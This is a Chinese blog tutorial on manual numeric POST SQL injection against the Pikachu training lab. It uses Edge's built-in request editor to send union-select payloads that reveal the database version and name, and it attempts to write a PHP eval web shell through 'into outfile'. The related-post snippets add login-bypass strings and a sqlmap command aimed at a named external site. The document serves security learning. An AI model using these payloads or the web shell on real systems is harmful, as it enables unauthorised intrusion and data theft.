pikachu SQL注入系列(post篇),无需额外工具,使用Edge浏览器自带工具注入

已于 2024-08-19 09:53:56 修改
阅读量786 收藏 8
点赞数 25
分类专栏: pikachu 文章标签: sql 数据库
于 2024-08-18 10:21:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46745664/article/details/141258953
版权

目录

一、首先来到 pikachu 的 SQL-inject 界面,选择 “数字型注入(post)”

 二、使用 Edge 自带工具进行抓包

一、首先来到 pikachu 的 SQL-inject 界面,选择 “数字型注入(post)”

 二、使用 Edge 自带工具进行抓包

我们可以发现这样一个post请求,我们看一下请求数据

我们再次使用 edge携带的默认工具,选择编辑并重新发送

点击body

此时我们不知道他的列数(但如果是比较有经验的就可以通过他的返回:hello, xxx
your email is: xxx 猜出至少有两列),但我们这就先用一列试试

我们目前猜测他使用的 sql 语句是:

SELECT [第一列],[第二列] FROM [表] WHERE id = 注入点 [...]

所有我们可以改成:

SELECT [第一列],[第二列] FROM [表] WHERE id =  3 union select 1 -- - [...]

“--[空格]” 在sql 中是单行注释,是为了防止后面有其他我们未知的语句,在我们注入后形成语法错误而导致报错!红色背景部分就是我们注入的语句

然后修改id,发送请求

发现报错,不止一列,那就再次修改(为了方便结果中查找,我就 ctrl+F 搜了一下 hello)

现在结果对了,那我们就可以试试我们想得到的数据

SELECT [第一列],[第二列] FROM [表] WHERE id =  3  union select version(),database() -- - [...]

这样就能同时查询到数据库版本和数据库信息了,但是前面正常的 id=3 的查询比较干扰我们的结果,我们可以通过后面加上 and 3=4 让他恒不成立,来达到只输出我们想要的信息

SELECT [第一列],[第二列] FROM [表] WHERE id =  3  and  3=4 union select version(),database() -- - [...]

这样因为3=4不成立,这样输出的结果只剩下我们要的数据库版本数据库名

想试着写入一句话木马。结果出现了“The MySQL server is running with the --secure-file-priv option so it ”

语句:

 3 and 3=4 union select 1,"<?php eval($_POST['cmd']);?>" into outfile "shell.php" -- -

出现错误原因是“secure_file_priv的值为null,表示禁止导出”

具体可以参考:

解决“MySQL server is running with the --secure-file-priv option so it cannot execute this statement”问题

Mr.Pascal
关注
专栏目录
POST注入
笔墨稠思
11-06 712
靶场地址 POST注入和GET注入几乎没有区别,只是GET注入在url上传参,而POST注入在FORM表单中传递参数。 首先,我们需要判断FORM表单是否存在sql注入: 这是一个登录表单,我采取了通用的登录方式 a’ or 1=1 发现登录成功,说明存在SQL注入 接下来我需要获取当前表的字段数来进行联合查询 用 order by 方法获取了当前表中有3个字段,之后判断回显点 通过联合查询 union select 1,2,3 发现会先点为2,3两字段位置,接下来就可以查询我们想要的内容了 查
mysql post 注入工具_Sqlmap POST注入 三种方法(转载)
weixin_39778582的博客
01-19 1133
不管怎么说?使用工具Sqlmap POST注入都会简单很多,具体说说Sqlmap POST注入 三种方法吧!一、自动填写表单自动填写表单是Sqlmap工具POST注入的第一种方法,具体步骤如下:1、判断是否有post注入?root@Kali:~# sqlmap -u http://vip.fj0730.cn/login.asp --forms出来的提示,一路回车就可以了!结果如下图:从这里,可以得...
【超详细】新手学习渗透测试靶场——Pikachu的安装与使用
KKleeeaa的博客
02-03 5641
Pikachu漏洞靶场搭建教程
post注入
我只会装360的博客
10-08 987
先观察网站,发现有一个搜索框,输入1测试,页面并没有变化 通过查看请求头发现是post请求 在搜索框中输入1’报错,并返回报错语句 输入1‘# 页面正常,说明此处存在注入 搜索game、2018等字符发现页面没有变化,搜索到了结果但不显示 搜索其他字符使页面发生变化 )无变化 “无变化 ‘报错 因为页面不会发生变化,通过union 布尔查询没有用,使用延时查询进行注入 搜索’ and sl...
sql注入 pikachu post数字型注入
08-12
Pikachu Post 数字型注入是一种新的 SQL 注入方法,不需要使用 BP,而是使用 Hackbar 工具来执行 SQL 语句。这种方法可以帮助攻击者更方便地 inject恶意 SQL 语句到目标系统中。 数字型注入 数字型注入是一种常见...
pikachu靶场SQL注入.docx
09-13
Pikachu靶场SQL注入中,我们可以使用FireFox浏览器或BurpSuite工具来测试字符型注入,通过测试,我们可以确定注入点。 Pikachu靶场SQL注入是非常危险的一种攻击手段,Web开发者应该采取措施来防止SQL注入攻击。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 906
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
pikachu sql注入题解
L1ni01
07-17 483
第一关.数字型注入post) 首先我们介绍一下数字型和字符型的sql注入 sql注入大致也可分为数字型和字符型 如何判断是数字型还是字符型呢 数字型判断: 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=1 和 and 1=2 来判断: Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步
SQL注入之字符型注入练习(pikachu
windStudyer的专栏
04-17 3785
SQL注入之字符型 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符型注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类型 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类型 从上可以看出,请求的方法为get类型,注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符型。 判断注入点 从2.1知道请求方法和注入类型,因为是字符..
网络安全之pikachu数字型注入post)实战
weixin_44255593的博客
02-25 1386
1、打开pikachu数字型注入post)靶场,随机选择一个数字进行查询,并开启BURP进行抓包。 2、使用UNION联合查询法判断字段数,测试在id=1后面构造order by 1和order by 2时没有报错,当个到第三个时回显报错,所以可以判断字段数为2个字段。 id=1 order by 1 &submit=%E6%9F%A5%E8%AF%A2 id=1 order by 3 &submit=%E6%9F%A5%E8%AF%A2 3、通过联合查询法构造un.
SQL注入 - POST注入方法
HAKUNAMATATATTA的博客
08-30 1025
SQL注入-POST注入方法教学
手把手教你挖POST注入
weixin_45733372的博客
05-01 567
POST注入高危点:登录框、查询框、等各种和数据库有交互的框 1、判断是否存在sql注入先用万能密码登陆试试看 ' or 1=1 -- qwe 2、登陆成功证明存在sql注入,下面在判断字段数 ' or 1=1 order by 3 -- qwe 1到3返回正常 4返回错误 3、 现在在判断回显点 ' and 1=1 union select 1,2,3 -- qwe 回显点是2,3 4、查询当前数据库名 ' and 1=1 un...
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 1178
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
(手工)【sqli-labs11-12】POST注入:基本步骤、示例
07-07 1438
SQL-POST注入
POST注入/HEAD注入
qq_58000413的博客
09-14 491
python sqlmap.py -u 目标url -delay=1 --level 3 --risk 2 -batch。python sqlmap.py -r 绝对路径 -delay=1 --level 3 --risk 2 -batch。select updataxml("a",concat("~", () ),"b") 这里需要拼接特殊字符串才可以报错。updatexml("a",绝对路径,"b") 更新xml文件内容。
实验:学习POST注入
茶花语的博客
02-25 6504
基于POST请求的SQL注入
pikachu sql注入
08-11
文章详细介绍了字符型SQL注入的过程和防范措施,可以帮助你更好地理解和应对这种类型的攻击。123 #### 引用[.reference_title] - *1* *2* [<em>PiKachuSql (SQL注入)通关 2022]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值